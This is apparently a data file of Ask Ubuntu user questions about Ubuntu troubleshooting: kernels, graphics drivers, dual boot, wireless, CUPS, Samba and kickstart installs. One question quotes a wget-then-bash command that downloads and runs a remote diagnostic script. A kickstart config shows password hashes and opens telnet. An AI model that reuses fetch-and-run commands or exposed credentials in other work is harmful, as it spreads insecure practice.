476961	shutdown does not power off computer on ubuntu 12.04	i recently got an update message mentioning there were 13 updates ready to be downloaded / installed , all pertaining to a newer version of the kernel . i could n't get the updates to be installed , as i got a message claiming there was n't enough free disk space in '/boot ' . researching the solutions to this problem , i hit upon this solution . sudo uname -a produced 3.11.0-20-generic . i had older versions of the kernel in 3.11.0-17 , 3.11.0-18 , 3.11.0-19 as well as 3.2.0-23 , 3.2.0-53 , 3.2.0-54 , 3.2.0-55 , 3.2.0-56 , 3.2.0-57 , 3.2.0-58 , 3.2.0-60 and 3.2.0-61 . to make more space , i removed 3.11.0-17 , 3.11.0-18 , 3.2.0-53 , 3.2.0-54 , 3.2.0-55 , 3.2.0-56 , 3.2.0-57 and 3.2.0-58 , as suggested in the solution . i currently have 3.11.0-19 , 3.11.0-20 , 3.2.0-23 , 3.2.0-60 , 3.2.0-61 and 3.2.0-63 , with sudo uname -a returning 3.11.0-22-generic . i could even restart after the kernel upgrade properly . however , i am not able to shutdown with poweroff . on clicking 'shutdown ' , the system reboots automatically . sudo shutdown -p now also only reboots and does not shutdown with poweroff completely . as i have a dual boot with windows , i am able start up with windows and shutdown / poweroff completely . this problem has only occurred due to removing older kernel versions manually to make more space in '/boot ' . is there a solution for this problem ? tia , ashok .
476963	unity window placement	when i launch an application ( by typing its name into the dash and hitting enter , clicking on its icon in the panel , or using a shortcut - it does n't matter ) the application window appears in the topmost left corner , next to the dash . is there a way to have a better window placement by default ? and by 'better ' , i mean mostly where i expect the window to be - usually in the center , but also considering other windows . this is how it looks like now :
476964	nvidia graphics driver on macbook pro 10,1	i just installed 14.04 over my old 12.04 partition on my macbook pro 10,1 ( which is dual-booting with os x ) by following the instructions here . the only difference is that i 'm using refind instead of refit . the proprietary nvidia drivers worked great with 12.04 , but now i 'm unable to boot into unity with it in 14.04 . generally , i just get a black screen after the grub menu , though occasionally i get some kind of panic screen like this , where i see errors like : [ drm : __gen6_gt_force_wake_mt_get ] *error* timed out waiting for forcewake old ack to clear . [ drm : __gen6_gt_wait_for_thread_c0 ] *error* gt thread status wait timed out [ drm : __intel_ring_setup_status_page ] *error* render ring : wait for syncflush to complete for tlb invalidation timed out etc . using the nouveau drivers works fine , but everything feels sluggish so i would really like to get the nvidia drivers working . has anyone successfully gotten the nvidia drivers working with the gt-650m mac edition ?
476965	customized run of c++ program in eclipse cdt on ubuntu	i have a folder of source codes , which using the make simply it generates diferent binary files . y1 , y2 , y3 , ..y6 , which are different versions of the program . for the build process in eclipse , everything is fine . but i 'm wondering how i can run the proper program on eclipse with the required arguments . e.g . i want to run y6 , and it has to get a file ( in ../traces/cap6.txt ) and some other arguments in order to run .
476967	what is the best ubuntu option for my pc ?	i have a pc with pentium 4 , 256 mb ram and 80 gb of harde disk . i want to install ubuntu but i do n't know which is the best option !
476969	how to recover my old installed ubuntu after installing windows	i am using windows 7 and ubuntu 12.04 dual boot system . in my windows 7 some issues occurred , so i re-install windows 7. after re-installing windows 7 , i lost my ubuntu os . how can i recover my ubuntu os help me asap regards , rajesh
476972	will ubuntu run on old dell pentium m 512 ram	trying to reuse this old dell laptop , , , i ca n't find a ubuntu or mint distro that the cpu will accept ? is it just too old to function ? came with xp pro 32 bit ? thanks for help/suggestions john in dallas
476978	computer starts , then asks for login , and then crashes	i recently replaced my really old windows os with ubuntu , and it looks like it works at first glance . when i attempt to log in , however , it accepts my username and password , then goes into what i believe is the ubuntu equivilant of a blue screen . how can i solve this ?
476980	i ca n't move any windows in unity	i upgraded to ubuntu 14.04 , and had tons of unity issues ( like many users , it seems ) . i was able to eventually get my dash and top bar back by trying all of the various resets folks have suggested , but one thing i still can not do is move any windows . whether they be application windows ( like this firefox one ) , or file explorer windows , i can not move them by dragging the title bar ; they seem locked . i 've also tried alt-space + m , and then using arrows , but nothing happens after hitting the 'm ' . i am also unable to re-size any of them by dragging a side or corner inward/outward . is there some hidden `` lock all windows from any movement '' feature in unity tweak tool , or some other system setting , that is prohibiting any action ? note that i tried logging in as a guest , and had no problems there ; resizing and movement worked fine , so it seems to be specific to my local user account .
476981	how do i make a desktop icon to launch a program ?	have an interesting issue . i am very new to ubuntu and linux systems . i have only been running linux on my laptop for a couple of months . here is what i am trying to do - i recently installed google earth and am trying to make a desktop icon for it . with other programs i have installed i have been able to copy the executable file from /usr/share/applications and then paste in the desktop folder . however google earth does not show in that folder and has a different way of loading . i tried copying the file like i did before but it pulls up as a text file . what i would like to do is create a very small executable file that i can put on the desktop to launch google earth . i found the command line for it is : /opt/google/earth/free/google-earth % f is there a way to write this into a executable file easily ? be aware i am very new and still learning . so be desciptive as possible , please . i am starting to understand the code , but still struggle at times . one last question , how do i change an icon image ? i am not seeing the setting to change it . thanks
476986	chrome browser pixelated and discolored	my chrome web browsers display is pixelated ranging from fonts to images and even the browser itself . i have tried to override the graphics card settings in the chrome developer settings window but it did not help . any help would be appreciated because i am new to ubuntu and have little experience with programing language . feel free to ask me any other information about the issue . i running version 12.04 lts and have downloaded chrome from the web . thanks .
476987	passing arguments to programs via dash	note : i 've found an answer myself while asking this question , but is there a way to do it in regular dash , that opens when you press super - and not by using alt+f2 ( which seems like an unnecessary addition ) ?
476989	ubuntu 12.04 - read only file system+computer crash/freezes after an update that got interupted	i 've run into an error with ubuntu while i was updating it . during the update my power went out and interrupted the update . when i finally got power and booted my computer , i received an error , telling me to remount ./ and basically told me i could press s to skip or f to fix . ( i forgot exactly what it said ) but anyways , i originally pressed f to fix , but that did n't solve the problem , so then i went into the terminal and i tried to remount that way , but i could n't execute because it 's stuck in `` file system read only . '' sorry , my description of the problem is dull . i 'm debating on just reinstalling , but i have a ton of files i would like to keep , about 3+ years worth of websites i 've built . is there a proper way to fix this ?
476994	window get transparent	i 'm using xubuntu 14.04 , after changing display from external screen to internal in my laptop my firefox window get a little bit transparent . the only one window which i set to have transparency is `` xfce4-terminal 0.6.3 '' , by it 's own configuration . i did n't play with transparency of any other programs or system settings , if there is any . the same kind of strange transparency has been before few times with nautilus window . why is it happen ? where can i adjust and play with these settings of transparency , or is it just a strange bug ? if so , where and how can i report this bug ? after reboot everything goes back to normal .
476999	how to use only intel graphics and power off radeon with proprietary catalyst drivers ?	i 've been using linux for quite a while in everyday computing and programming . but now i got this new laptop with amazing battery life on windows which runs pretty cool even while gaming . but for some reason on ubuntu i get like 1/3 battery life and it gets hot even while browsing the web . i have the proprietary drivers for radeon , but i 'm thinking about upgrading from ubuntu 12.04 to 14.04 , and i would like to know how can i use only the intel graphics and have radeon always turned off ? since i do not need the discrete graphics on ubuntu and i 'm pretty sure my problem is related to the radeon sucking up my battery and generating heat . my laptop technical specifications are : dell latitude 3540 intel core i7 4500u ( with intel hd4400 graphics ) ati radeon hd 8850m with 2gb gddr5 vram 8 gb ddr3l @ 1600mhz toshiba 256gb ssd ubuntu 12.4.3 if you need any additional info , please tell me : )
477002	loadparm.c:4864 , leaking memory ?	i’m running ubuntu 14.04 server with a lamp stack , samba , and ftp , no gui , just sshing into the server and working on it . i’m having trouble searching down a solution to this issue , but as far as i can google for it , it might have something to do with samba . no talloc stackframe at ../source3/param/loadparm.c:4864 , leaking memory ? ? the warning does n't pop up at any kind of regular intervals or in response to the same or repeated actions . it pops up between things i’m doing - changing directories , editing files , copying stuff , and it often pops up when i first log in . has anyone got experience fixing this issue ?
477008	when i tried installing google chrome , it asked me for a root password	i just got ubuntu on my windows 7 laptop . when i installed google chrome , it asked me for a `` root password '' . i tried my own password for my account and it did n't work . then i searched for a way to change my root password , but all i got did n't work . i need help .
477012	how do i find out the version pigenhole installed	so i installed pigeonhole with apt-get install dovecot-managesieved dovecot-sieve but it looks to me that behaviour is different from documented . i think that might be because ubuntu source version lags behind . how do i check what version of pigeonhole is installed on my system ?
477015	how to install crebs on ubuntu 14.04 ?	i tried installing crebs on ubuntu 14.04. unfortunately the repository installation does n't work , so i decided to download the source code . but after following their instructions ( namely running setup.sh as root ) i get this error when typing `` crebs '' in a terminal : traceback ( most recent call last ) : file `` /usr/local/bin/crebs '' , line 38 , in < module > from crebs.main import main file `` /usr/local/bin/../share/crebs/lib/crebs/__init__.py '' , line 6 , in < module > from gtk import glade importerror : can not import name glade any hint ? thank you
477016	pipelight was working with chrome , but it stopped once i restarted	i restarted my computer and went into terminal and enabled pipelight . however , when i try to play a netflix video ( with user agent switcher activated ) it asks me to install silverlight ? i dont know what happened , it worked fine when i first installed and ran it . any ideas ? i was using firefox 15 with user agent switcher on chrome , the ie options lead to an error saying active x needs to be enabled .
477017	unity does not load after update	how can i solve the following problem ? there is no unity dash or nothing after i updated my system last night . system information : distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty kernel version : 3.13.0-27-generic and i have nvidia drivers 331.67 installed . i have also tried to fix this by following the advice from this post : unity does n't load , no launcher , no dash appears but no luck . in the compizconfig settings manager , ubuntu unity plugins is enabled , but no unity , even after a reboot . if there is a way to retrieve the list of packages which got updated the last time , please tell me so that i can post them here .
477022	wireless is detected , but not connecting . ethernet works . how to correct the wireless address ?	i am running ubuntu 14.04 with cable internet , and my wireless is detected and connected , but i can not connect to the internet . i know the problem is with my machine because other machines are connecting to the same router just fine . i can connect via ethernet just fine as well . here are some notable tests : ping 192.168.0.105 works with 0 % packet loss , but ping 192.168.0.1 has 100 % packet loss . when i plug in my ethernet , ping 192.168.0.1 works with 0 % packet loss . my wireless name is tg , and the router ip is 192.168.0.1 ( where i can enter username and password ) . i suspect that i need to change my wireless address from 192.168.0.105 to 192.168.0.1 . any suggestions on how to proceed ? extra info : [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' tg '' mode : managed frequency:2.462 ghz access point : 00:02:6f:83 : f8 : f4 bit rate=1 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=62/70 signal level=-48 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:52 invalid misc:166 missed beacon:0 [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ ifconfig eth0 link encap : ethernet hwaddr f0 : de : f1 : b2:53:53 inet addr:192.168.0.100 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :f2de : f1ff : feb2:5353/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:980003 errors:0 dropped:0 overruns:0 frame:0 tx packets:498384 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1320506168 ( 1.3 gb ) tx bytes:59780591 ( 59.7 mb ) interrupt:20 memory : f3a00000-f3a20000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:21927 errors:0 dropped:0 overruns:0 frame:0 tx packets:21927 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1781719 ( 1.7 mb ) tx bytes:1781719 ( 1.7 mb ) wlan0 link encap : ethernet hwaddr 24:77:03:29:8f : dc inet addr:192.168.0.105 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :2677:3ff : fe29:8fdc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11828 errors:0 dropped:0 overruns:0 frame:0 tx packets:15444 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4855662 ( 4.8 mb ) tx bytes:2250585 ( 2.2 mb ) [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ lspci -nn | grep 0280 03:00.0 network controller [ 0280 ] : intel corporation centrino ultimate-n 6300 [ 8086:4238 ] ( rev 3e ) [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no with ethernet unplugged : [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ route -n | grep ug 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 with ethernet plugged in : [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ route -n | grep ug 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ nm-tool networkmanager tool state : connected ( global ) - device : wlan0 [ tg ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : connected default : no hw address : 24:77:03:29:8f : dc capabilities : speed : 52 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) tatum : infra , 40:8b:07 : d8 : a5:04 , freq 2437 mhz , rate 54 mb/s , strength 42 w pa wpa2 ums : infra , 00:20 : a6:72:52 : bf , freq 2437 mhz , rate 54 mb/s , strength 59 alpha 40 : infra , 28 : cf : e9:86:59:5d , freq 5260 mhz , rate 54 mb/s , strength 30 w pa wpa2 thepromiselan : infra , 58:6d:8f:51 : e5:54 , freq 2452 mhz , rate 54 mb/s , strength 34 $ pa wpa2 xfinitywifi : infra , 06:1d : d5:84:27 : a0 , freq 2437 mhz , rate 54 mb/s , strength 52 *tg : infra , 00:02:6f:83 : f8 : f4 , freq 2462 mhz , rate 54 mb/s , strength 73 w pa2 ums : infra , 00:20 : a6 : a1:9f:25 , freq 2452 mhz , rate 54 mb/s , strength 44 brian-pc_network : infra , 20 : aa:4b : dd:93 : d6 , freq 2462 mhz , rate 54 mb/s , strength 35 w pa2 home-c0f8 : infra , 44:32 : c8 : d2 : c0 : f8 , freq 2412 mhz , rate 54 mb/s , strength 40 w pa wpa2 abcsexy : infra , 28:28:5d:27:5d:85 , freq 2412 mhz , rate 54 mb/s , strength 27 w pa wpa2 ipv4 settings : address : 192.168.0.105 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : connected default : yes hw address : f0 : de : f1 : b2:53:53 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.0.100 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1
477023	all traffic is passed through openvpn although not requested	i have a bash script on a ubuntu box which searches for the fastest openvpn server , connects , and binds one program to the tun0 interface . unfortunately , all traffic is being passed through the vpn . does anybody know what 's going on ? the relevant line follows : openvpn -- daemon -- config $ cfile -- auth-user-pass ipvanish.pass -- status openvpn-status.log there do n't seem to be any entries in iptables when i enter sudo iptables -- list . the config files look like this : client dev tun proto tcp remote nyc-a04.ipvanish.com 443 resolv-retry infinite nobind persist-key persist-tun persist-remote-ip ca ca.ipvanish.com.crt tls-remote nyc-a04.ipvanish.com auth-user-pass comp-lzo verb 3 auth sha256 cipher aes-256-cbc keysize 256 tls-cipher dhe-rsa-aes256-sha : dhe-dss-aes256-sha : aes256-sha
477028	maas fails to commission nodes	i 'm evaluating maas/juju . i followed instructions in this link http : //maas.ubuntu.com/docs1.5/install.html to setup maas . i 'm running this in oracle virtualbox environment so power options are not configured for the vms . pxe booting vm works fine . the node shuts down itself and registers with maas in declared state . issues : when i commission the vm ( which is in the declared state ) , first it gets ip-config : no response after 60 secs - giving up errors . ( see link below for a screenshot ) . fails to mount the boot device and drops into initramfs prompt . i 've copied logs here : https : //www.dropbox.com/sh/5gy9nnonbnccufo/aad9o4awsotyaccmre5q7rbva any help to get past this is greatly appreciated . thanks !
477033	how i can install csh as a non-root user ?	i need csh for installing a package but i am not root user ... i want to install it for my user . i installed csh_20070713.orig.tar.gz , csh_20070713.diff.gz and csh_20070713-2ubuntu1.dsc but there is not dpkg-source command ... then i did following procedure : untar *.tar.gz mv csh_20070713.orig csh_20070713 mkdir csh_20070713/debian gunzip csh_20070713.diff.gz patch -p0 < csh_20070713.diff chmod +x csh_20070713/debian/rules i do not know what should i do next ! i used make and make install command in csh_20070713 directory and also debian directory but nothing happened ...
477035	what is the preferred/recommend way of running two version of ubuntu side by side	i am running 14.04 , but i need to run some corporate software/scripts that have been specifically designed for 12.04 . i am aware of virtual box/vmware for full virtualization but i am looking for something more lightweight ( on my windows machine both come at a significant cost in battery life ) closer to os virtualization level . ideally , i would like something like windows 7/8 compatibility mode : the ability to run a program as if i were on 12.04 . does ubuntu/linux have such mechanism ? what is the preferred way of running programs/scripts designed for an older version of ubuntu ?
477042	ubuntu 14.04 install on usb using mac	i 'm having trouble with this step in creating the usb boot : diskutil unmountdisk /dev/diskn i 've also tried unmounting the disk from the disk utility window , but when going on to the next step : sudo dd if=/path/to/downloaded.img of=/dev/rdiskn bs=1m i get an error of : '' no such file or directory ''
477043	problem executing file & unable to open terminal window	i have latest ubuntu - and using it as a live cd 1. i have an executable file ( file manager confirms that file is executable ) that wo n't execute & file manager wo n't let me tick the permission box that confirms file is executable 2.how do i run the command line i.e . ca n't seem to be able to open a terminal window ? ? i thought i might be able to chmod the file ( i.e . u+x ) or even give myself administrators rights - what is root 's password with the live cd - i let boot-up procedures log in for me hope someone can help me regards judy adams
477044	syslink form virtualbox shared folder	i have a ubuntu 14.04 server guest os with ubuntu 14.04 host os . my virtualbox version is 4.3.10 . i mount my shared folder to /media/sf_share in guest . i make a folder in this shared folder and make syslink to /home/ubuntu/ with the following command . ln -sf sf_share/test /home/ubuntu i can create syslink but ca n't access to the syslink directory . actually i want to place this syslink to openerp addon folder and make it able to read from openerp . but it does n't work . and i make a folder in openerp addon and make syslink to /media/sf_share/ . it work but this folder ca n't access from host os . i also tried to mount the shared folder directly to my desired directory but i got only protocol error . i tried with this command . sudo mount -t vboxsf -o uid=1000 , gid=1000 share /home/ubuntu/share already installed virtualbox guest addition in my guest os . i ca n't find no more solution . please help me .
477046	error message on ubuntu 13.10 aspire 4741z machine	`` unknown error : 'class 'systemerror ' ( e : the package linux-image-extra-3.11.0-17-generic needs to be reinstalled , but i ca n't find an archive for it . ) ' this error appeared and struck completely the machine . ca n't use wifi connection and i tried to reboot using a cd iso image to reinstall , but it always boot the same . i 'm a very basic user as u can see . how can i force the system to booth by cd only and re-install ubuntu . thanks in advance for kind replies . stefano
477047	how to set up dual graphics cards on 12.04	i have a dell c1100 server and a nvidia graphics card . i have searched google and have only found how to set up dual monitors . i would like to be able to use both the integrated vga card and the nvidia card i added . how do i set something like that up on ubuntu 12.04 ? computer : dell cs24-ty graphics card : nvidia geforce 8600 gt
477049	startup disk creator shows no free space on my usb stick	i am having a problem trying to use startup disk creator with my 8gb usb stick . the usb stick has just been formatted , but startup disk creator shows that there is no free space on the drive , although i can use it just fine . i am not sure whether the problem comes from when i used the drive previously with windows 7 usb dvd download tool to install windows on another computer ? when i press 'erase disk ' , it shows the message below : org.freedesktop.dbus.python.gi._glib.gerror : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/dbus/service.py '' , line 707 , in _message_cb retval = candidate_method ( self , *args , **keywords ) file `` /usr/share/usb-creator/usb-creator-helper '' , line 239 , in format block.call_format_sync ( 'dos ' , glib.variant ( 'a { sv } ' , { 'erase ' : glib.variant ( 's ' , '' ) } ) , none ) gi._glib.gerror : gdbus.error : org.freedesktop.udisks2.error.failed : error synchronizing after initial wipe : timed out waiting for object
477050	`` no root file system is defined '' when using kickstart	we are using physical server and are in process of automated âubuntu-12.04.1-server-amd64â os installation on it . there are two hdd for os installation purpose and there are raid1 relation between them . this setup has been done through bios . the kickstart configuration file looks like this : # generated by kickstart configurator # platform=amd64 or intel em64t # system language lang en_us # language modules to install langsupport en_us # system keyboard keyboard us # system mouse mouse # system timezone timezone asia/dili # root password rootpw -- iscrypted $ 1 $ yl1qjyta $ kzit.kq3i9e5xaiqkcujn/ # initial user user ankit -- fullname `` ankit '' -- iscrypted -- password $ 1 $ c6yflpea $ pi1qq59/jgywmgwbv25z3/ # reboot after installation reboot # use text mode install text # install os instead of upgrade install # use web installation url -- url my_repo_location # system bootloader configuration bootloader -- location=mbr # clear the master boot record zerombr yes # partition clearing information clearpart -- all -- initlabel # disk partitioning information part /boot -- fstype ext4 -- size 100 -- ondisk sda part / -- fstype ext4 -- size 10000 -- ondisk sda part /var -- fstype ext4 -- size 10000 -- ondisk sda part swap -- size 1024 -- ondisk sdb # system authorization infomation auth -- useshadow -- enablemd5 # network information network -- bootproto=dhcp -- device=eth0 # firewall configuration firewall -- enabled -- trust=eth0 -- http -- ftp -- ssh -- telnet -- smtp # x window system configuration information xconfig -- depth=8 -- resolution=640x480 -- defaultdesktop=gnome but i am getting the below error : no root file system is defined do we need to do any modification in kickstart configuration file ? the automated ubuntu os installation is successful in virtual machine ( vm ) with the above ks.cfg ( kickstart configuration file ) but failing in case of physical machine .
477053	issues with importing existing source c++ code in eclipse cdt	i have cloned an emulator 's source code from git , and would like to work on it on eclipse cdt on my ubuntu 12.04 . i have tried different ways , such as creating a hello world project , and simply copy/paste my codes in this project , or using the import option from eclipse , but none of them work as it should . for the later option , the source code does not recognize even the default include headers , and in the first one i have problem building/running the code given its makefile . can someone tell me the correct way to import existing source codes with built-in makefile ? the source code folder has already a makefile inside , which nicely builds on terminal . it creates a few executables ( y1 , y2 , ... y6 ) , which each need proper arguments to run .
477057	wifi hotspot configuration	i was trying to activate network sharing on my computer and i had this error message from the terminal your wireless card or driver does not support access point mode . my wireless card info is as follows description : wireless interface product : centrino advanced-n 6200 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 35 serial : 00:27:10:80 : db:30 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-29-generic firmware=9.221.4.1 build 25532 latency=0 link=no multicast=yes wireless=ieee 802.11abgn '' i am not a comp guru but can follow instructions very well , please help .
477059	how do i restore a certain lost link ?	my only link to wifi disapeared . how do i retrieve it and place it back on the toolbar ? its not in the toolbar 's list of possible links .
477061	sound not working , alsamixer not working	i 'm on ubuntu 14.04 and when i booted it the sound was working . but it was n't working the way it does on windows 7 , like in it there is a feature for me to use dolby technology to create really nice sound . on ubuntu , it just really bad just 'treble ? '' and no bass . it does n't even use the subwoofer present on my laptop . so i tried installing this [ extracted , complied , install make ] . used the linux version . it just completely broke the sound system on my laptop . no more sound or anything . i did this too from a thread i found , sudo apt-get -- purge remove linux-sound-base alsa-base alsa-utils sudo apt-get install linux-sound-base alsa-base alsa-utils it did n't to anything . now i ran this command wget -o alsa-info.sh http : //www.alsa-project.org/alsa-info.sh & & bash alsa-info.sh -- upload and this is its output . my laptop is qomsio f 50-126 with builtin subwooder and two speakers and running ubuntu 14.04 . the image of the sound setting window
477065	windows partition recognized as unallocated space	i am new to linux . i was trying to dual boot windows 8.1 and ubuntu when i came across this : ubuntu installer wo n't recognize windows as an os and the c drive is recognized as `` unallocated space '' by ubuntu . how can i install ubuntu alongside windows ? i tried installing before , when windows 8 was uefi , i now reinstalled windows 8 and it 's not uefi now , what should i do ?
477066	is update checking automatic for default ?	in a freshly installed ubuntu 14.04 when it is started and connected to the internet , does update manager automatically receives the list of updates ? i want to turn it off if a the freshly installed ubuntu 14.04 receives the list of updates automatically . btw , my main question is if it is on by default in a newly installed ubuntu 14.04 and how to check it .
477067	how to temporarily block network access to root user ?	just want to temporarily block network access sometimes , even to the root user . how can i do this ?
477071	how to fix the issue in connecting allwinner android tablet for usb debugging on ubuntu 14.04	i have issues in connecting android tablet for usb debugging on ubuntu 14.04 . i have followed the tutorial from http : //forum.xda-developers.com/showthread.php ? t=1228508 karthikeyan @ spark : ~ $ lsusb bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 003 : id 045e:0745 microsoft corp. nano transceiver v1.0 for bluetooth bus 003 device 023 : id 1f3a:1009 bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub 1f3a is the vendor id . i have added the same in rules file . # allwinner subsystem== '' usb '' , attrs { idvendor } == '' 1f3a '' , mode= '' 0660 '' , group= '' plugdev '' , owner= '' karthikeyan '' line on the /etc/fstab # mount point for allwinner tablet mtpfs /media/allwinner fuse user , noauto , allow_other 0 0 when i connect the device as mtp , it mounts a drive . but it throws error as below . device 0 ( vid=1f3a and pid=1007 ) is unknown . please report this vid/pid and the device model to the libmtp development team ignoring libusb_claim_interface ( ) = -6ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device inep : usb_get_endpoint_status ( ) : resource temporarily unavailable outep : usb_get_endpoint_status ( ) : resource temporarily unavailable libusb_open ( ) failed ! : resource temporarily unavailable libmtp panic : could not init usb on second attempt unable to open raw device 0 adb does n't show any device connected . adb devices
477072	installing noise on ubuntu	i really want it on ubuntu , because it 's like itunes . i listen to a lot of music so it 's nice to have a good player installed . it 's called noise , and comes pre-installed on elementary .
477079	installation ubuntu 14 alongside windows 7	can anyone please guide me to install ubuntu alongside windows 7 ? i have a 160gb hdd and it will have 3 partitions . i made a bootable usb using lili creator . the usb booted fine . but when i enter into the ubuntu installation window , i did n't get the option to install alongside windows 7 . i got 3 options as shown below : - install inside windows ( when i click on 'install ' it will restart the computer and it enters into windows and nothing happens ) replace windows with ubuntu something else
477082	hide/remove network printers from printing dialog	i have four printers if i go to dash and then printers . however , if when i print in the dialog there are many printers ( 100 ? ) that show up that i have never seen/installed . i 'm guessing they 're network printers . how can i remove them or prevent them from showing up ? this problem only started happening on 14.04. my file /etc/cups/cupsd.conf is below # # # sample configuration file for the cups scheduler . see `` man cupsd.conf '' for a # complete description of this file . # # log general information in error_log - change `` warn '' to `` debug '' # for troubleshooting ... loglevel warn # deactivate cups ' internal logrotating , as we provide a better one , especially # loglevel debug2 gets usable now maxlogsize 0 # administrator user group ... systemgroup lpadmin # only listen for connections from the local machine . listen localhost:631 listen /var/run/cups/cups.sock # show shared printers on the local network . browsing off browseorder allow , deny browseallow all browselocalprotocols cups dnssd browseaddress @ local # default authentication type , when authentication is required ... defaultauthtype basic # web interface setting ... webinterface yes # restrict access to the server ... < location / > order allow , deny < /location > # restrict access to the admin pages ... < location /admin > order allow , deny < /location > # restrict access to configuration files ... < location /admin/conf > authtype default require user @ system order allow , deny < /location > # set the default printer/job policies ... < policy default > # job/subscription privacy ... jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default # job-related operations must be done by the owner or an administrator ... < limit create-job print-job print-uri validate-job > order deny , allow < /limit > < limit send-document send-uri hold-job release-job restart-job purge-jobs set-job-attributes create-job-subscription renew-subscription cancel-subscription get-notifications reprocess-job cancel-current-job suspend-current-job resume-job cancel-my-jobs close-job cups-move-job cups-get-document > require user @ owner @ system order deny , allow < /limit > # all administration operations require an administrator to authenticate ... < limit cups-add-modify-printer cups-delete-printer cups-add-modify-class cups-delete-class cups-set-default cups-get-devices > authtype default require user @ system order deny , allow < /limit > # all printer operations require a printer operator to authenticate ... < limit pause-printer resume-printer enable-printer disable-printer pause-printer-after-current-job hold-new-jobs release-held-new-jobs deactivate-printer activate-printer restart-printer shutdown-printer startup-printer promote-job schedule-job-after cancel-jobs cups-accept-jobs cups-reject-jobs > authtype default require user @ system order deny , allow < /limit > # only the owner or an administrator can cancel or authenticate a job ... < limit cancel-job cups-authenticate-job > require user @ owner @ system order deny , allow < /limit > < limit all > order deny , allow < /limit > < /policy > # set the authenticated printer/job policies ... < policy authenticated > # job/subscription privacy ... jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default # job-related operations must be done by the owner or an administrator ... < limit create-job print-job print-uri validate-job > authtype default order deny , allow < /limit > < limit send-document send-uri hold-job release-job restart-job purge-jobs set-job-attributes create-job-subscription renew-subscription cancel-subscription get-notifications reprocess-job cancel-current-job suspend-current-job resume-job cancel-my-jobs close-job cups-move-job cups-get-document > authtype default require user @ owner @ system order deny , allow < /limit > # all administration operations require an administrator to authenticate ... < limit cups-add-modify-printer cups-delete-printer cups-add-modify-class cups-delete-class cups-set-default > authtype default require user @ system order deny , allow < /limit > # all printer operations require a printer operator to authenticate ... < limit pause-printer resume-printer enable-printer disable-printer pause-printer-after-current-job hold-new-jobs release-held-new-jobs deactivate-printer activate-printer restart-printer shutdown-printer startup-printer promote-job schedule-job-after cancel-jobs cups-accept-jobs cups-reject-jobs > authtype default require user @ system order deny , allow < /limit > # only the owner or an administrator can cancel or authenticate a job ... < limit cancel-job cups-authenticate-job > authtype default require user @ owner @ system order deny , allow < /limit > < limit all > order deny , allow < /limit > < /policy > # #
477087	does ubuntu uninstall unnecessary updates ?	ubuntu checks and installs updates automatically which takes up a lot of space in the system . is there a something similar we can do to uninstall deprecated or unused services or libraries so that space will be freed ? i install all the updates is it good ?
477096	how to unmount a usb flash drive ( that is shared over samba ) without having to turn off samba first ?	i have a usb drive that is shared over the network via a samba share . this is because the contents are to be managed by a remote user . now , there is a local user with physical access to the usb drive . once the remote user has finished `` managing '' the usb drive , he instructs the local user to unmount the drive for safekeeping . however , since the usb flash drive is currently being shared over samba , the unmount operation can not succeed without the samba process first releasing the usb drive 's file system . this is undesirable because stopping samba would affect the many other users using the other samba shares . is there any way to circumvent this problem ? or am i doing it wrong in the first place ? or what if the local user just pulls out the usb drive anyway ? will this cause any problems ?
